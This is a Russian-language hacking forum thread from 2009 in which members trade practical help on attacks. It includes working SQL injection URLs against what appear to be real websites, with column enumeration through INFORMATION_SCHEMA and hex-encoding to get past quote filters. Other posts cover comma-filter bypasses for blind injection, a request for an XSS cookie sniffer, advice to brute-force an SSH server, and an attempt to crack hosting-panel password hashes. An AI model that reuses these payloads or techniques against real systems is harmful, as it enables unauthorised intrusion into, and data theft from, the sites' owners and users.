Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    На ачате уже много раз обсуждалось. Создавай картинку с помощью js.
     
    #8941 mailbrush, 20 Sep 2009
    Last edited: 20 Sep 2009
  2. Cehennem

    Cehennem Banned

    Joined:
    3 Jun 2009
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.
     
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Это краткое описание уязвимостей php.
     
    1 person likes this.
  4. Cehennem

    Cehennem Banned

    Joined:
    3 Jun 2009
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму.

    плизззззззззз
     
  5. cristoff

    cristoff New Member

    Joined:
    22 May 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть удаленный хост с открым 22 портом. На нем висит SSH2.0-OpenSSH_4.3. Хотелось бы найти возможность удаленно управлять. Искал на милворм, нашел только на Denial, да и он не сработал... Испытывал на cygwin.
    Есть еще варианты?
     
  6. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    2Cehennem ветка чуть ниже "XSS для чайников" , только чтоб работало переводиш в чар как ты в своем примере показывал.

    2cristoff брут или ищи другие баги на серваке.
     
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    magic_quotes или addslashes будут мешать тильде `?
     
  8. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    нет
     
    2 people like this.
  9. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    Доброго времени суток всем уважаемым!

    Подскажите плз, как можно обойти фильтрацию ',' (запятая) в sql при выполнении запросов типа

    userid=10+UNION+SELECT+1,2,3,4,5,6/*
    и
    userid=10+and+ASCII(SUBSTRING(user(),1,1))>0/*

    Заранее всем благодарен
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если обычный str_replace - никак запятую не поставишь.
    Но я думаю, можно одним способом, который я сейчас проверю.
     
  11. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    жду
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нет, нельзя :)
    Я думал с хексом поиграть, но ничего не вышло...
     
    1 person likes this.
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    В слепых скулях можно юзать так:

    userid=10+and+ASCII(SUBSTRING(user() FROM 1 FOR 1))>0/*

    первое - с какого символа, второе - сколько символов

    Единственная накладка - в выборке с лимитом нужна запятая, но можно обойтись, к примеру этим where id = 1 и т.д.
     
    3 people like this.
  14. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    Еще вопросик.
    Может кто сталкивался с HELM - управление доменнами, хостом etc

    так вот вопрос - как расшифровать хеши?

    Сам хеш - 61F3ADC9E4F1D793B2614ACD1B3B7332C0730E461C395DCDB1C846784C6B00BC
    Соответствует паролю 558dd-dd

    Так же имеется файл, который как мне кажется и криптует все это



    Если у кого получится рассшифровать или есть какие либо идеии - побеспокойте плз в асю
    29ЧO78Ч26
     
  15. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    TO GREY - ОГРОМНОЕ СПАСИБО - ПОЛУЧИЛОСЬ!!!!!!
     
  16. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Там можно и без запятой, пример: LMIT 1 OFFSET 1
     
    3 people like this.
  17. неумейка

    неумейка New Member

    Joined:
    22 Sep 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Добрый день уважаемые гуру, вот занялся изучением SQL-инъекций, не могу разобраться:
    Делаю инъекции для определения имен таблиц:
    Code:
    http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+4,1
    Все работает, перебирая limit нашел интересную табличку guest_book
    Делаю так, чтоб узнать колонки:
    Code:
    http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='guest_book'+LIMIT+1,1
    НЕ работает !
    Code:
    Select_Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'guest_book\' LIMIT 1,1' at line 5SELECT `mar_news`.`news_date`, `mar_news`.`news_small_en`, `mar_news`.`news_big_en`, `mar_news`.`photo_alb_page_id`,`mar_news`.`file_en`,`mar_news`.`file_anchor_en`, `mar_news`.`category_name_id` FROM `mar_news` WHERE `mar_news`.`news_id` = -32 union select 1,2,COLUMN_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\'guest_book\' LIMIT 1,1
    Подскажите пожалуйста в чем загвоздка.
     
    #8957 неумейка, 22 Sep 2009
    Last edited: 22 Sep 2009
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    WHERE+TABLE_NAME=guest_book
    Без '
    Там же видно в чём ошибка.
     
    1 person likes this.
  19. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Вообще то WHERE+TABLE_NAME=0x67756573745f626f6f6b, так как фильтруются кавычки, нужно либо хексить, либо чарить.

    Code:
    http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b+LIMIT+1,1
    Ну и для удобства вот так:

    Code:
    http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,group_concat(COLUMN_NAME),4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b--+
    Получаем:
    Code:
    guest_book_id,gb_name,gb_email,gb_date,gb_text,gb_lang
     
    #8959 Ins3t, 22 Sep 2009
    Last edited: 22 Sep 2009
  20. ph4nt0m

    ph4nt0m Member

    Joined:
    10 Aug 2009
    Messages:
    11
    Likes Received:
    15
    Reputations:
    0
    Вот столкнулся, что и как дальше незнаю и можно ли из этого что то получить:

    http://sk-kr.ru/

    далее:
    http://sk-kr.ru/index.php?id=2&cid=2
    подставляя ' в любой из параметров получаем чистый экран, по запросу :

    http://sk-kr.ru/index.php?id=2

    получаем:

    собсно, можно ли провести инъекцию ?
     
Thread Status:
Not open for further replies.